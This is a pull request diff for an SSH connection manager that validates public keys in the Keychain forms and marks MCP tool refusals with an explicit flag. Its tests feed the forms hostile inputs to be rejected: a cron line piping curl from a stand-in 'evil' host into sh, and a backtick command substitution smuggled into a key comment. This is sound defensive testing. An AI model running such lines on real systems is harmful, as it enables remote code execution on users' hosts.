### PR TITLE
fix: public-key validation on the UI import path, explicit MCP refusal marker

### DIFF
--- a/src/components/keychain/IdentityForm.tsx
+++ b/src/components/keychain/IdentityForm.tsx
@@ -26,6 +26,7 @@ import { PinButton } from "@/components/shared/PinButton";
 import { useIdentityStore } from "@/stores/identityStore";
 import { useTeamStore } from "@/stores/teamStore";
 import { KeyFileDropZone } from "./KeyForm";
+import { PublicKeyField, isPublicKeyInvalid } from "./PublicKeyField";
 import { getConnectionIcon, getConnectionIconColor } from "@/utils/icons";
 import { AvatarTile } from "@/components/shared/AvatarTile";
 import type { AuthType, Connection, Identity, IdentityFormData } from "@/types";
@@ -268,7 +269,11 @@ export function IdentityForm({ initial, onSubmit, onClose, onDelete, flushRef, i
         keyMaterial,
       ) ?? undefined;
     },
-    canSave: () => !!username.trim() && (!isInline || !!inlinePrivKey.trim()),
+    // Same rule as KeyForm: an inline public half that is not a key is never
+    // persisted, and the inline error under the field says why.
+    canSave: () =>
+      !!username.trim()
+      && (!isInline || (!!inlinePrivKey.trim() && !isPublicKeyInvalid(inlinePublicKey))),
   });
   const markDirty = useCallback(() => {
     if (isDirtyRef) isDirtyRef.current = true;
@@ -405,18 +410,11 @@ export function IdentityForm({ initial, onSubmit, onClose, onDelete, flushRef, i
                 placeholder="-----BEGIN OPENSSH PRIVATE KEY-----&#10;..."
               />
             </div>
-            <div>
-              <label className={formLabelClass} style={formLabelStyle}>
-                {t("keychain.common.publicKey")} <span className="text-(--t-text-dim) font-normal">{t("keychain.common.optional")}</span>
-              </label>
-              <textarea
-                className={`${formInputClass} font-mono text-xs h-16 resize-none`}
-                style={formInputStyle}
-                value={inlinePublicKey}
-                onChange={(e) => { markDirty(); setInlinePublicKey(e.target.value); }}
-                placeholder="ssh-ed25519 AAAA..."
-              />
-            </div>
+            <PublicKeyField
+              value={inlinePublicKey}
+              onChange={(v) => { markDirty(); setInlinePublicKey(v); }}
+              heightClass="h-16"
+            />
             <KeyFileDropZone
               onPrivateKey={(v) => { markDirty(); setInlinePrivKey(v); }}
               onPublicKey={(v) => { markDirty(); setInlinePublicKey(v); }}

--- a/src/components/keychain/KeyForm.tsx
+++ b/src/components/keychain/KeyForm.tsx
@@ -24,6 +24,7 @@ import { buildKeychainMenuItems } from "@/utils/keychainMenuItems";
 import { detectKeyInfo } from "./keyDetection";
 import { KeyFileDropZone } from "./KeyFileDropZone";
 import { KeyGenFields } from "./KeyGenFields";
+import { PublicKeyField, isPublicKeyInvalid } from "./PublicKeyField";
 
 // Re-exported for back-compat (IdentityForm imports KeyFileDropZone from here).
 export { KeyFileDropZone } from "./KeyFileDropZone";
@@ -123,7 +124,9 @@ export function KeyForm({ initial, initialMode, onSubmit, onClose, onExport, onD
       publicKeyDirty.current ? publicKey : null,
       passphraseDirty.current ? passphrase : null,
     ) ?? undefined,
-    canSave: () => !!privateKey.trim(),
+    // A public half that is not a key is never persisted: autosave holds until
+    // the field is emptied or corrected, and the inline error says why.
+    canSave: () => !!privateKey.trim() && !isPublicKeyInvalid(publicKey),
   });
   const markDirty = useCallback(() => {
     if (isDirtyRef) isDirtyRef.current = true;
@@ -261,18 +264,11 @@ export function KeyForm({ initial, initialMode, onSubmit, onClose, onExport, onD
                 autoComplete="new-password"
               />
             </div>
-            <div>
-              <label className={formLabelClass} style={formLabelStyle}>
-                {t("keychain.common.publicKey")} <span className="text-(--t-text-dim) font-normal">{t("keychain.common.optional")}</span>
-              </label>
-              <textarea
-                className={`${formInputClass} font-mono text-xs h-20 resize-none`}
-                style={formInputStyle}
-                value={publicKey}
-                onChange={(e) => { markDirty(); publicKeyDirty.current = true; setPublicKey(e.target.value); }}
-                placeholder="ssh-ed25519 AAAA..."
-              />
-            </div>
+            <PublicKeyField
+              value={publicKey}
+              onChange={(v) => { markDirty(); publicKeyDirty.current = true; setPublicKey(v); }}
+              heightClass="h-20"
+            />
           </FormSection>
 
           <FormSection label={t("keychain.keyForm.sectionImportFromFile")}>

--- a/src/components/keychain/PublicKeyField.tsx
+++ b/src/components/keychain/PublicKeyField.tsx
@@ -1,0 +1,57 @@
+import { useTranslation } from "react-i18next";
+import { Icon } from "@iconify/react";
+import {
+  formInputClass, formInputStyle, formLabelClass, formLabelStyle,
+} from "@/components/shared/Panel";
+import { isValidSshPublicKey } from "@/services/sshPublicKey";
+
+/**
+ * True when the field holds something that is not a public key. Empty stays
+ * legal: the public half is optional, and a key saved without one still works
+ * for authentication.
+ *
+ * The same rule guards the plugin/MCP route and `addKeyToHost`, so a bad value
+ * could never reach a remote machine — but it could still be SAVED here, and the
+ * user's first symptom was a key that imported without complaint and refused to
+ * deploy weeks later. The form is where that is cheap to say.
+ */
+export function isPublicKeyInvalid(value: string): boolean {
+  return value.trim() !== "" && !isValidSshPublicKey(value);
+}
+
+/** The optional public-half input, shared by KeyForm and IdentityForm's inline
+ *  key material — same rule, same message, same field. */
+export function PublicKeyField({
+  value,
+  onChange,
+  heightClass,
+}: {
+  value: string;
+  onChange: (value: string) => void;
+  heightClass: string;
+}) {
+  const { t } = useTranslation();
+  return (
+    <div>
+      <label className={formLabelClass} style={formLabelStyle}>
+        {t("keychain.common.publicKey")}{" "}
+        <span className="text-(--t-text-dim) font-normal">{t("keychain.common.optional")}</span>
+      </label>
+      <textarea
+        className={`${formInputClass} font-mono text-xs ${heightClass} resize-none`}
+        style={formInputStyle}
+        value={value}
+        onChange={(e) => onChange(e.target.value)}
+        placeholder="ssh-ed25519 AAAA..."
+      />
+      {isPublicKeyInvalid(value) && (
+        <div className="flex items-center gap-1.5 mt-1.5">
+          <Icon icon="lucide:circle-x" width={12} className="text-(--t-status-error)" />
+          <span className="text-xs text-(--t-status-error)">
+            {t("keychain.keyForm.invalidPublicKey")}
+          </span>
+        </div>
+      )}
+    </div>
+  );
+}

--- a/src/components/keychain/keychainForms.characterisation.test.tsx
+++ b/src/components/keychain/keychainForms.characterisation.test.tsx
@@ -294,3 +294,57 @@ test("the key form loads its stored material and hides the mode toggle when edit
   expect(textareas[1].value).toBe("PUB");
   expect(screen.queryByText("keychain.keyForm.modeGenerate")).toBeNull();
 });
+
+const VALID_PUB = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5 kipavy@laptop";
+
+test("the key form refuses to save a public half that is not an SSH public key", async () => {
+  const { onSubmit, flushRef } = renderKey();
+  const [priv, pub] = Array.from(document.querySelectorAll("textarea"));
+  fireEvent.change(priv, { target: { value: "-----BEGIN OPENSSH PRIVATE KEY-----\nx" } });
+  fireEvent.change(pub, { target: { value: "* * * * * root curl http://evil/x|sh" } });
+  await act(async () => {
+    flushRef.current!();
+  });
+  // Stored, it would be written verbatim into a remote file by addKeyToHost —
+  // and the user's first symptom would be a key that imported fine and refused
+  // to deploy. Nothing is saved, and the field says why.
+  expect(onSubmit).not.toHaveBeenCalled();
+  expect(screen.getByText("keychain.keyForm.invalidPublicKey")).toBeTruthy();
+});
+
+test("the key form saves once the public half is corrected", async () => {
+  const { onSubmit, flushRef } = renderKey();
+  const [priv, pub] = Array.from(document.querySelectorAll("textarea"));
+  fireEvent.change(priv, { target: { value: "-----BEGIN OPENSSH PRIVATE KEY-----\nx" } });
+  fireEvent.change(pub, { target: { value: "not a key" } });
+  await act(async () => {
+    flushRef.current!();
+  });
+  expect(onSubmit).not.toHaveBeenCalled();
+  fireEvent.change(pub, { target: { value: VALID_PUB } });
+  await act(async () => {
+    flushRef.current!();
+  });
+  expect(onSubmit).toHaveBeenCalledTimes(1);
+  expect(onSubmit.mock.calls[0][2]).toBe(VALID_PUB);
+  expect(screen.queryByText("keychain.keyForm.invalidPublicKey")).toBeNull();
+});
+
+test("the identity form refuses to save inline key material with a bad public half", async () => {
+  const { onSubmit, flushRef } = renderIdentity();
+  fireEvent.change(screen.getByPlaceholderText("root"), { target: { value: "deploy" } });
+  fireEvent.click(screen.getByText("keychain.identityForm.noKey"));
+  fireEvent.click(screen.getByText("keychain.identityForm.newKeyInline"));
+  const textareas = Array.from(document.querySelectorAll("textarea"));
+  fireEvent.change(textareas[textareas.length - 2], {
+    target: { value: "-----BEGIN OPENSSH PRIVATE KEY-----\nx" },
+  });
+  fireEvent.change(textareas[textareas.length - 1], {
+    target: { value: "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5 `id`" },
+  });
+  await act(async () => {
+    flushRef.current!();
+  });
+  expect(onSubmit).not.toHaveBeenCalled();
+  expect(screen.getByText("keychain.keyForm.invalidPublicKey")).toBeTruthy();
+});

--- a/src/i18n/locales/en/keychain.json
+++ b/src/i18n/locales/en/keychain.json
@@ -97,6 +97,7 @@
       "sectionKeyExport": "Key Export",
       "unknownType": "Unknown type",
       "invalidKey": "Invalid key",
+      "invalidPublicKey": "Not an SSH public key — expected \"ssh-ed25519 AAAA… comment\" on one line. It will not save, and cannot be added to a host.",
       "keyPassphrasePlaceholder": "Key passphrase"
     },
     "identityForm": {

--- a/src/i18n/locales/fr/keychain.json
+++ b/src/i18n/locales/fr/keychain.json
@@ -97,6 +97,7 @@
       "sectionKeyExport": "Export de clé",
       "unknownType": "Type inconnu",
       "invalidKey": "Clé invalide",
+      "invalidPublicKey": "Ce n'est pas une clé publique SSH — format attendu : « ssh-ed25519 AAAA… commentaire » sur une seule ligne. Elle ne sera pas enregistrée et ne peut pas être ajoutée à un hôte.",
       "keyPassphrasePlaceholder": "Phrase secrète de la clé"
     },
     "identityForm": {

--- a/src/i18n/locales/ru/keychain.json
+++ b/src/i18n/locales/ru/keychain.json
@@ -113,6 +113,7 @@
       "sectionKeyExport": "Экспорт ключа",
       "unknownType": "Неизвестный тип",
       "invalidKey": "Недействительный ключ",
+      "invalidPublicKey": "Это не открытый ключ SSH — ожидается «ssh-ed25519 AAAA… комментарий» в одну строку. Он не будет сохранён и не может быть добавлен на хост.",
       "keyPassphrasePlaceholder": "Кодовая фраза ключа"
     },
     "identityForm": {

--- a/src/i18n/locales/zh/keychain.json
+++ b/src/i18n/locales/zh/keychain.json
@@ -97,6 +97,7 @@
       "sectionKeyExport": "密钥导出",
       "unknownType": "未知类型",
       "invalidKey": "无效密钥",
+      "invalidPublicKey": "这不是 SSH 公钥 —— 应为单行的「ssh-ed25519 AAAA… 注释」格式。它不会被保存，也无法添加到主机。",
       "keyPassphrasePlaceholder": "密钥口令"
     },
     "identityForm": {

--- a/src/mcp/consumer.test.ts
+++ b/src/mcp/consumer.test.ts
@@ -2,6 +2,7 @@ import { describe, it, expect, vi } from "vitest";
 import { z } from "zod";
 import { buildMcpTools, listToolDescriptors, callTool, MCP_TEXT } from "./consumer";
 import * as toolSurface from "@voltius/tools";
+import { refusal } from "@voltius/tools";
 import { registerContributions, clearContributions } from "./contributions";
 import { buildDockerMcpTools } from "@/plugins/docker/mcpTools";
 import { buildProxmoxMcpTools } from "@/plugins/proxmox/mcpTools";
@@ -88,42 +89,53 @@ describe("MCP consumer", () => {
     expect(out).toEqual({ ok: false, error: MCP_TEXT.notOwnedError });
   });
 
-  it("a refusal returned as { error } becomes a failed call, not a successful one", async () => {
-    const tools = [{
-      name: "refuser",
-      description: "d",
-      schema: z.object({}),
-      execute: async () => ({ error: "Vault \"x\" still holds 2 connections" }),
-    }] as unknown as Parameters<typeof callTool>[0];
-    expect(await callTool(tools, "refuser", {})).toEqual({
-      ok: false, error: 'Vault "x" still holds 2 connections',
-    });
+  const refusingTool = (result: unknown) => [{
+    name: "refuser",
+    description: "d",
+    schema: z.object({}),
+    execute: async () => result,
+  }] as unknown as Parameters<typeof callTool>[0];
+
+  it("a marked refusal becomes a failed call, not a successful one", async () => {
+    const result = await callTool(
+      refusingTool(refusal('Vault "x" still holds 2 connections')),
+      "refuser",
+      {},
+    );
+    expect(result).toEqual({ ok: false, error: 'Vault "x" still holds 2 connections' });
   });
 
-  it("makeGate's { error, reason } denial is a failed call too, not a success", async () => {
-    // The gate's rejection carries a reason beside the error; counting keys let
-    // this shape — a user's own denial — through as ok:true/isError:false.
-    const tools = [{
-      name: "denied",
-      description: "d",
-      schema: z.object({}),
-      execute: async () => ({ error: "rejected by user", reason: "not this host" }),
-    }] as unknown as Parameters<typeof callTool>[0];
-    expect(await callTool(tools, "denied", {})).toEqual({
-      ok: false, error: "rejected by user",
-    });
+  it("makeGate's denial is a failed call too, not a success", async () => {
+    const result = await callTool(
+      refusingTool(refusal("rejected by user", { reason: "not this host" })),
+      "refuser",
+      {},
+    );
+    expect(result).toEqual({ ok: false, error: "rejected by user" });
+  });
+
+  it("a refusal carrying a recovery payload stays a refusal", async () => {
+    // guardConnectionId's rejection lists the real connections beside `error`.
+    // Recognising refusals by which keys sit beside `error` reported this to the
+    // client as ok:true — a call that opened nothing, read as one that worked.
+    const result = await callTool(
+      refusingTool(refusal("no connection with id \"prod\"", { connections: [{ id: "c1" }] })),
+      "refuser",
+      {},
+    );
+    expect(result).toEqual({ ok: false, error: 'no connection with id "prod"' });
   });
 
   it("a result that merely carries an error field alongside data stays a success", async () => {
-    const tools = [{
-      name: "mixed",
-      description: "d",
-      schema: z.object({}),
-      execute: async () => ({ error: "partial", items: [1] }),
-    }] as unknown as Parameters<typeof callTool>[0];
-    expect(await callTool(tools, "mixed", {})).toEqual({
-      ok: true, result: { error: "partial", items: [1] },
-    });
+    const result = await callTool(refusingTool({ error: "partial", items: [1] }), "refuser", {});
+    expect(result).toEqual({ ok: true, result: { error: "partial", items: [1] } });
+  });
+
+  it("an unmarked bare { error } result is data, not a refusal", async () => {
+    // A contributed (third-party) tool does not go through `refusal()`; its
+    // payload is its own, and the host does not guess at its meaning.
+    const result = await callTool(refusingTool({ error: "container not found" }), "refuser", {});
+    expect(result).toEqual({ ok: true, result: { error: "container not found" } });
   });
 
   it("converts each tool's zod schema to a JSON Schema object for tools/list", () => {

--- a/src/mcp/consumer.ts
+++ b/src/mcp/consumer.ts
@@ -186,25 +186,24 @@ export async function callTool(
 }
 
 /**
- * The refusal message of a `{ error }` result, or null when the result is data.
+ * The refusal message of a refused result, or null when the result is data.
  *
- * `objectOp` and `makeFileOp` catch a refusal and hand back `{ error }` inside a
- * successful call, which the transport then reports as `isError: false` — a
- * client that trusts the envelope reads "the vault was deleted" when it was
- * refused and is still there.
+ * The gate, `objectOp` and `makeFileOp` catch a refusal and hand it back inside
+ * a successful call, which the transport would otherwise report as
+ * `isError: false` — a client that trusts the envelope reads "the vault was
+ * deleted" when it was refused and is still there.
  *
- * The test is the `error` string itself, not the number of keys: `makeGate`'s
- * rejection carries a `reason` beside it, and counting keys let that shape —
- * a user's own denial — through as a success. `reason` is the only companion a
- * refusal has; anything else beside `error` is a payload, and a verb that
- * returns an error field alongside real data stays a success.
+ * The test is the explicit `refused: true` marker `refusal()` stamps, never the
+ * shape of the result. Recognising a refusal by which keys sit beside `error`
+ * needs a complete list of them, and that list was already wrong: a
+ * `guardConnectionId` rejection carries `connections`, so an unknown
+ * `connectionId` was reported to the client as a successful call. A refusal that
+ * grows a field now stays a refusal, and the deliberate distinction is kept —
+ * an `error` field ALONGSIDE real data, with no marker, is still a success.
  */
-const REFUSAL_COMPANION_KEYS = new Set(["error", "reason"]);
-
 function refusalMessage(result: unknown): string | null {
   if (typeof result !== "object" || result === null) return null;
   const record = result as Record<string, unknown>;
-  if (typeof record.error !== "string") return null;
-  if (Object.keys(record).some((k) => !REFUSAL_COMPANION_KEYS.has(k))) return null;
+  if (record.refused !== true || typeof record.error !== "string") return null;
   return record.error;
 }

--- a/src/plugins/toolSurface/connectionGuard.ts
+++ b/src/plugins/toolSurface/connectionGuard.ts
@@ -1,4 +1,5 @@
 import type { PluginAPI } from "@/plugins/api";
+import { refusal } from "./refusal";
 
 /** How many connections the model-facing error will enumerate before telling
  *  the model to call `list_connections` itself. */
@@ -40,10 +41,10 @@ export async function guardConnectionId(
   if (conns?.some((c) => c.id === connectionId)) return { ok: true };
   return {
     ok: false,
-    result: {
-      error: `no connection with id ${JSON.stringify(connectionId)}; ${FIX_IT}`,
-      ...connectionsField(conns),
-    },
+    result: refusal(
+      `no connection with id ${JSON.stringify(connectionId)}; ${FIX_IT}`,
+      connectionsField(conns),
+    ),
   };
 }
 
@@ -63,10 +64,9 @@ export async function guardPlanConnectionIds(
   if (unknown.length === 0) return { ok: true };
   return {
     ok: false,
-    result: {
-      error: `plan not shown to the user: ${unknown.length} step connection id(s) match no saved connection; ${FIX_IT}, then propose the plan again`,
-      unknownConnectionIds: unknown,
-      ...connectionsField(conns),
-    },
+    result: refusal(
+      `plan not shown to the user: ${unknown.length} step connection id(s) match no saved connection; ${FIX_IT}, then propose the plan again`,
+      { unknownConnectionIds: unknown, ...connectionsField(conns) },
+    ),
   };
 }

--- a/src/plugins/toolSurface/coreTools.test.ts
+++ b/src/plugins/toolSurface/coreTools.test.ts
@@ -415,7 +415,7 @@ describe("the text port", () => {
   it("uses a consumer's not-owned error in close_session", async () => {
     const tools = buildCoreTools(makePorts({ text: { notOwnedError: "not yours" } }));
     const out = await tools.find((t) => t.name === "close_session")!.execute({ sessionId: "nope" });
-    expect(out).toEqual({ error: "not yours" });
+    expect(out).toEqual({ refused: true, error: "not yours" });
   });
 
   it("uses a consumer's not-owned error in close_session's post-approval check", async () => {
@@ -424,6 +424,6 @@ describe("the text port", () => {
     const tools = buildCoreTools(ports);
     await tools.find((t) => t.name === "open_session")!.execute({ connectionId: "conn-A" }); // owns sess-1, not "not-owned"
     const out = await tools.find((t) => t.name === "close_session")!.execute({ sessionId: "sess-1" });
-    expect(out).toEqual({ error: "not yours" });
+    expect(out).toEqual({ refused: true, error: "not yours" });
   });
 });

--- a/src/plugins/toolSurface/index.ts
+++ b/src/plugins/toolSurface/index.ts
@@ -15,4 +15,6 @@ export type { ConnectionRef, ConnectionGuardResult } from "./connectionGuard";
 export { FILE_TOOLS, deriveScope } from "./scope";
 export { buildCoreTools } from "./coreTools";
 export type { ToolSurfacePorts } from "./coreTools";
+export { refusal } from "./refusal";
+export type { Refusal } from "./refusal";
 export { ALL_PERMISSIONS } from "./groups";

--- a/src/plugins/toolSurface/refusal.ts
+++ b/src/plugins/toolSurface/refusal.ts
@@ -1,0 +1,19 @@
+export type Refusal = { refused: true; error: string } & Record<string, unknown>;
+
+/**
+ * A tool call that did nothing, returned as a value rather than thrown.
+ *
+ * `refused: true` is what marks it. Consumers must not infer a refusal from the
+ * presence of an `error` field: a verb is free to return an error string
+ * alongside real data, and that is still a success. Every place in the core tool
+ * surface that declines to act builds its result here, so the marker cannot be
+ * forgotten by one caller — and so a refusal can carry whatever helps the model
+ * recover (`reason`, the connection list) without that extra field turning the
+ * refusal back into a reported success.
+ *
+ * Its own module rather than `tools/helpers`: the connection guard needs it too,
+ * and `helpers` sits downstream of `coreTools`.
+ */
+export function refusal(error: string, extra?: Record<string, unknown>): Refusal {
+  return { ...extra, refused: true, error };
+}

--- a/src/plugins/toolSurface/tools/connections.test.ts
+++ b/src/plugins/toolSurface/tools/connections.test.ts
@@ -105,6 +105,7 @@ describe("connection mutation verbs", () => {
     const { ports } = makePorts();
     const result = await tool(ports, "connection_update").execute({ connectionId: "t1", name: "x" });
     expect(result).toEqual({
+      refused: true,
       error: "connection \"t1\" is owned by a team vault and cannot be changed from here",
     });
   });
@@ -113,6 +114,7 @@ describe("connection mutation verbs", () => {
     const { ports, api } = makePorts();
     const result = await tool(ports, "connection_delete").execute({ connectionId: "t1" });
     expect(result).toEqual({
+      refused: true,
       error: "connection \"t1\" is owned by a team vault and cannot be changed from here",
     });
     expect(api.connections.delete).not.toHaveBeenCalled();

--- a/src/plugins/toolSurface/tools/connections.ts
+++ b/src/plugins/toolSurface/tools/connections.ts
@@ -2,11 +2,12 @@ import { z } from "zod";
 import type { Tool } from "../types";
 import type { ToolSurfacePorts } from "../coreTools";
 import { makeGate, objectOp } from "./helpers";
+import { refusal } from "../refusal";
 
 export const CONNECTION_PERMISSIONS = ["connections:read", "connections:write", "audit"] as const;
 
 const TEAM_REFUSAL = (id: string) =>
-  ({ error: `connection "${id}" is owned by a team vault and cannot be changed from here` });
+  refusal(`connection "${id}" is owned by a team vault and cannot be changed from here`);
 
 /** Project a raw Connection record down to the PluginConnection contract — the
  *  underlying record carries fields (env_vars, notes, vault_id, ...) no verb
@@ -105,8 +106,8 @@ export function buildConnectionTools(ports: ToolSurfacePorts): Tool[] {
       }),
       execute: async (raw) => {
         const id = String(raw.connectionId);
-        const refusal = await guardTeam(ports, id);
-        if (refusal) return refusal;
+        const teamRefusal = await guardTeam(ports, id);
+        if (teamRefusal) return teamRefusal;
         return op(
           "connection_update",
           "agent.object_updated",
@@ -135,8 +136,8 @@ export function buildConnectionTools(ports: ToolSurfacePorts): Tool[] {
       schema: z.object({ connectionId: z.string() }),
       execute: async (raw) => {
         const id = String(raw.connectionId);
-        const refusal = await guardTeam(ports, id);
-        if (refusal) return refusal;
+        const teamRefusal = await guardTeam(ports, id);
+        if (teamRefusal) return teamRefusal;
         return op(
           "connection_delete",
           "agent.object_deleted",

--- a/src/plugins/toolSurface/tools/helpers.ts
+++ b/src/plugins/toolSurface/tools/helpers.ts
@@ -1,6 +1,7 @@
 import type { PluginAuditAction, PluginSession } from "@/plugins/api";
 import type { ApprovalVia } from "../types";
 import type { ToolSurfacePorts } from "../coreTools";
+import { refusal } from "../refusal";
 
 export type GateResult =
   | { ok: true; args: Record<string, unknown>; scope: string; via: ApprovalVia }
@@ -10,7 +11,7 @@ export type GateResult =
 export function makeGate(ports: ToolSurfacePorts) {
   return async (tool: string, args: Record<string, unknown>): Promise<GateResult> => {
     const decision = await ports.approve({ tool, args });
-    if (!decision.approve) return { ok: false, result: { error: "rejected by user", reason: decision.reason } };
+    if (!decision.approve) return { ok: false, result: refusal("rejected by user", { reason: decision.reason }) };
     return { ok: true, args: decision.args ?? args, scope: decision.scope, via: decision.via };
   };
 }
@@ -61,7 +62,7 @@ export function makeFileOp(ports: ToolSurfacePorts, gate: ReturnType<typeof make
     try {
       return { ok: true, result: (await run(g.args)) ?? null };
     } catch (err) {
-      return { error: err instanceof Error ? err.message : String(err) };
+      return refusal(err instanceof Error ? err.message : String(err));
     }
   };
 }
@@ -92,7 +93,7 @@ export function objectOp(ports: ToolSurfacePorts, gate: ReturnType<typeof makeGa
     try {
       return { ok: true, result: (await run(g.args)) ?? null };
     } catch (err) {
-      return { error: err instanceof Error ? err.message : String(err) };
+      return refusal(err instanceof Error ? err.message : String(err));
     }
   };
 }

--- a/src/plugins/toolSurface/tools/identities.test.ts
+++ b/src/plugins/toolSurface/tools/identities.test.ts
@@ -75,7 +75,7 @@ describe("identity verbs", () => {
 
   it("returns the error instead of throwing when the store rejects", async () => {
     const { ports } = makePorts({ delete: vi.fn(async () => { throw new Error("referenced"); }) });
-    expect(await tool(ports, "identity_delete").execute({ id: "i1" })).toEqual({ error: "referenced" });
+    expect(await tool(ports, "identity_delete").execute({ id: "i1" })).toEqual({ refused: true, error: "referenced" });
   });
 
   it("declares exactly the permissions its verbs reach", () => {

--- a/src/plugins/toolSurface/tools/keys.test.ts
+++ b/src/plugins/toolSurface/tools/keys.test.ts
@@ -81,7 +81,7 @@ describe("key verbs", () => {
 
   it("returns the error instead of throwing when the store rejects", async () => {
     const { ports } = makePorts({ keys: { delete: vi.fn(async () => { throw new Error("in use"); }) } });
-    expect(await tool(ports, "key_delete").execute({ id: "k1" })).toEqual({ error: "in use" });
+    expect(await tool(ports, "key_delete").execute({ id: "k1" })).toEqual({ refused: true, error: "in use" });
   });
 
   it("declares exactly the permissions its verbs reach", async () => {

--- a/src/plugins/toolSurface/tools/objects.test.ts
+++ b/src/plugins/toolSurface/tools/objects.test.ts
@@ -59,7 +59,7 @@ describe("object tools", () => {
     const move = vi.fn(async () => { throw new Error("Refused: allowCrossVault"); });
     const { ports } = makePorts(move);
     const result = await tool(ports, "object_move").execute({ ids: ["a"], vault_id: "v1" });
-    expect(result).toEqual({ error: expect.stringContaining("allowCrossVault") });
+    expect(result).toEqual({ refused: true, error: expect.stringContaining("allowCrossVault") });
   });
 
   it("audits the first object id but names no destination the caller passed", async () => {

--- a/src/plugins/toolSurface/tools/sessions.ts
+++ b/src/plugins/toolSurface/tools/sessions.ts
@@ -4,11 +4,19 @@ import type { ToolSurfacePorts } from "../coreTools";
 import { captureCommand, sendSerialCommand } from "../capture";
 import { guardConnectionId } from "../connectionGuard";
 import { makeGate, makeLiveSession } from "./helpers";
+import { refusal } from "../refusal";
 
 export const SESSION_PERMISSIONS = [
   "sessions:read", "sessions:write", "terminal:read", "terminal:stream", "terminal:write",
   "connections:read", "audit",
 ] as const;
+
+// Both are checked twice — once before the gate so a doomed call never asks for
+// approval, once after so a session closed while the approval sat pending is
+// caught — so the refusal is built in one place rather than four.
+const NO_SUCH_SESSION = () => refusal("no such open session; call list_sessions for the current ids");
+const notOwned = (ports: ToolSurfacePorts) =>
+  refusal(ports.text?.notOwnedError ?? "session not owned by agent; call open_session first");
 
 export function buildSessionTools(ports: ToolSurfacePorts): Tool[] {
   const gate = makeGate(ports);
@@ -71,7 +79,7 @@ export function buildSessionTools(ports: ToolSurfacePorts): Tool[] {
         // matching nothing open can never run, so carding it would ask the user
         // to authorize an action that is already doomed.
         if (!liveSession(String(raw.sessionId))) {
-          return { error: "no such open session; call list_sessions for the current ids" };
+          return NO_SUCH_SESSION();
         }
         const g = await gate("run_command", raw);
         if (!g.ok) return g.result;
@@ -81,7 +89,7 @@ export function buildSessionTools(ports: ToolSurfacePorts): Tool[] {
         // the user may have closed the session in the meantime.
         const session = liveSession(sessionId);
         if (!session) {
-          return { error: "no such open session; call list_sessions for the current ids" };
+          return NO_SUCH_SESSION();
         }
         // Recorded BEFORE dispatch, deliberately: the command reaches the
         // shell whether or not the capture comes back, and a crash mid-capture
@@ -122,13 +130,13 @@ export function buildSessionTools(ports: ToolSurfacePorts): Tool[] {
       schema: z.object({ sessionId: z.string() }),
       execute: async (raw) => {
         if (!ports.owned.has(String(raw.sessionId))) {
-          return { error: ports.text?.notOwnedError ?? "session not owned by agent; call open_session first" };
+          return notOwned(ports);
         }
         const g = await gate("close_session", raw);
         if (!g.ok) return g.result;
         const sessionId = String(g.args.sessionId);
         if (!ports.owned.has(sessionId)) {
-          return { error: ports.text?.notOwnedError ?? "session not owned by agent; call open_session first" };
+          return notOwned(ports);
         }
         await ports.api.sessions.close(sessionId);
         ports.owned.delete(sessionId);

--- a/src/plugins/toolSurface/tools/vaults.test.ts
+++ b/src/plugins/toolSurface/tools/vaults.test.ts
@@ -81,6 +81,7 @@ describe("vault verbs", () => {
       delete: vi.fn(async () => { throw new Error('Vault "Homelab" still holds 2 connections'); }),
     });
     expect(await tool(ports, "vault_delete").execute({ id: "v-1" })).toEqual({
+      refused: true,
       error: 'Vault "Homelab" still holds 2 connections',
     });
   });


### PR DESCRIPTION
Two of the three P3 Wave B follow-ups.

## Validate the public half on the UI import path

`isValidSshPublicKey` already guarded the plugin/MCP route and `addKeyToHost`, so an unvalidated public key could never reach a remote machine — but the Keychain form still saved one, and the user's first symptom was a key that imported without complaint and refused to deploy later.

`KeyForm` and `IdentityForm`'s inline key material each carried their own copy of the field; both now render the new shared `PublicKeyField`, which applies the same rule, shows an inline error, and holds autosave until the value is emptied or corrected. Strings in en/fr/zh/ru.

## Mark refusals explicitly instead of guessing from result shape

`refusalMessage` recognised a refusal by an allow-list of keys allowed to sit beside `error`, so any refusal that grew a third field silently became a successful call again.

That list was already wrong, so this is a live bug and not only hardening: `guardConnectionId`'s rejection carries `connections`, so `open_session` with an unknown `connectionId` was reported to MCP clients as `ok: true` — a call that opened nothing, read as one that worked.

Every core-surface refusal is now built by `refusal()` (new `src/plugins/toolSurface/refusal.ts` — its own module because the connection guard needs it and `helpers` sits downstream of `coreTools`), which stamps `refused: true`; `refusalMessage` tests only that marker. A refusal can carry whatever helps the model recover without turning back into a success, and the deliberate distinction is kept: an unmarked `error` field alongside real data is still a payload.

## Gates

- `npx tsc --noEmit` — 0
- full vitest — 2701 passed. Two failures are environmental only (a 5s cap on a real vite build in `tests/pluginBundleBuild.test.ts`, and a `TitleBar` sync-state flake); each passes when run alone.
- No live MCP gate over the real socket for these two.

Follow-up 1 (no verb exposes an object's `vault_id`/`folder_id`) is untouched — it needs a ruling on which verbs get the fields and whether `vault_id` leaks anything about team vaults.